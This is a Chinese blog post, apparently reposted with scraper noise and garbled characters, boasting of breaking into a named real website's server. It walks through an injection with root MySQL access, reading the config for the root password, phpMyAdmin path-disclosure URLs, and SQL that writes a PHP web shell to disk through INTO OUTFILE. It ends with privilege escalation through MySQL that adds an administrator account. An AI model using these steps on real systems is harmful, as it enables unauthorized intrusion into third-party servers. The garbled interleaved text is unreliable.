看黑客是如何黑了落伍者的

前天,听说落伍分类信息程序发布了,就想前去看看,什么样子的.一看,真不愧是落伍的产品,风格依然落伍,功能还行,大体一看没什么漏洞.

sk It8}i!I._z,D0因为在检测的时候发现是mysql的root,直接找工具pangolin,读文件吧,怎么读文件也是很有技巧的,这里不多说,读到setting.php,终于读到root的密码了.IXPUB技术博客4_r rf%F;Rpb!N0q
javascript:if(this.width>500)this.width=500" border=0>IXPUB技术博客4c;u-]:y?H&V
现在就开始猜phpmyadmin的路径了,这个倒是很顺利.IXPUB技术博客A0W0[2tUwj
http://phper.xihuidc.com.cn/phpmyadmin/,然后就很简单了.暴路径,暴路径我给大家几个办法:
2Ss/k+N'|T&?Z0引用
:VW6@$Mb0phpMyAdmin/libraries/select_lang.lib.php
1~/s"T:p4n0[~~!n_0phpMyAdmin/darkblue_orange/layout.inc.phpIXPUB技术博客s Kg{3c!nk
phpMyAdmin/index.php?lang[]=1
#zdwxTW0路径出来了.E:\phpMyadmin\phpmyadmin\libraries\select_lang.lib.php
!q/_,FS0z|hr7~(Y,c0javascript:if(this.width>500)this.width=500" border=0>
gO4}]$y0写个shell进去.
Ydx9xE\ A0Create TABLE tmdsb(shell text NOT NULL);
I v5w4q"G)T$XV0Insert INTO tmdsb (shell) VALUES('test');IXPUB技术博客|Q8F)cX.mJ
select shell from tmdsb into outfile 'E:\phpMyadmin\phpmyadmin\libraries\php.php';
,E"j*dc2s.U:d[0Drop TABLE tmdsb;IXPUB技术博客/j(P0t*C k)P

IXPUB技术博客7n7jz$Bge K
有个小马就好办了,再传个大马进去.发现每个磁盘根目录都不能浏览,甚至跳到D:\public_html\php.com.cn\wwwroot\这里也跳不过去,只能在phpmyadmin的目录溜达,这里表扬下IDC,做的不错.看看C:\Progra~1,没有SERV-U,不能用Serv-U提权了,上传一个su.php,由于MYSQL是以系统权限安装的,(在WINDOWS服务管理里面可以看到,是以服务加载的)所以,这里我考虑用MYSQL提权,如图:
9d7t*YV;w+^#uX7a'T0(这个shell里的我给拼错了,select和cmdshell,直接导致我以为服务器net.exe做了限制...其实没有...)
7`o mIF j0javascript:if(this.width>500)this.width=500" border=0>IXPUB技术博客2P5fKR6Z
javascript:if(this.width>500)this.width=500" border=0>IXPUB技术博客@^8M1a8\
修改用户k666.com的密码,并添加到管理员组,成功登陆服务器.IXPUB技术博客5Cjwk&d

20089130156568